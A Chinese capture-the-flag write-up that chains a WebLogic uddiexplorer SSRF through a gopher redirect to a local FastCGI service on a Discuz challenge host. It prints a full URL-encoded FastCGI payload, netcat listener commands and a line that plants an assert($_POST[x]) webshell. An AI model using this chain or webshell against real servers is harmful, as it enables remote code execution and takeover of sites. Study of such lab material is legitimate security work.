MENU

来自星星的你系列 1 writeup

来自星星的你系列 1 writeup

0x00 引子

来自星星的你被我给丢了,我可能需要用我所有的一切才能把你找回,编了两句就编不下去了,好吧,我承认这是一期渗透题,就是这么直接。


  • tips 1: SSRF
  • tips 2: 或许可以扫描下目录?
  • tips 3: /console/ 这个目录会对你有帮助

0x01 Discuz X3.2

发现是个Discuz
Discuz!另一处SSRF无须登陆无须条件
然后想起了rr菊苣写的文
利用 gopher 协议拓展攻击面
然后查看了一下info.php并没有开启gopher协议
然后扫目录发现了

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/

weblogic的uddiexplorer引发的ssrf
weblogic ssrf案例

然后根据rr菊苣的方法
新建一个1.php内容如下

<?php
header("Location: gopher://127.0.0.1:2333/_test");
?>

然后nc监听

nc -lvv 2333

然后构造请求

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip/1.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

QQ截图20160607195754.jpg

嗯收到了请求.
通过这个weblogic的SSRF可以得知开放了(FastCGI)9000和(redis)6379
获得路径 /opt/discuz/info.php
先生成payload

fcgi_exp.exe system 127.0.0.1 2222 /opt/discuz/info.php "echo
‘assert(${_POST}[x]);’ > /opt/discuz/data/233333.php"
nc -l -p 2222 > t.txt

然后urlencode一下就好

然后在1.php中修改成我们构造的payload

<?php
header("Location:gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%12%06%00%0F%14SCRIPT_FILENAME/opt/discuz/info.php%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0E%03CONTENT_LENGTH111%0F%08SERVER_PROTOCOLHTTP/1.1%0D%01DOCUMENT_ROOT/%0E%04REQUEST_METHODPOST%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00o%01%00%3C%3Fphp%20system%28%27echo%20%27assert%28%24%7B_POST%7D%5Bx%5D%29%3B%27%20%3E%20/opt/discuz/data/233333.php%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00");
?>

然后就完工了
参考
可惜没有参加.

Tags: writeup
Archives QR Code
QR Code for this page
Tipping QR Code
Title - Artist
0:00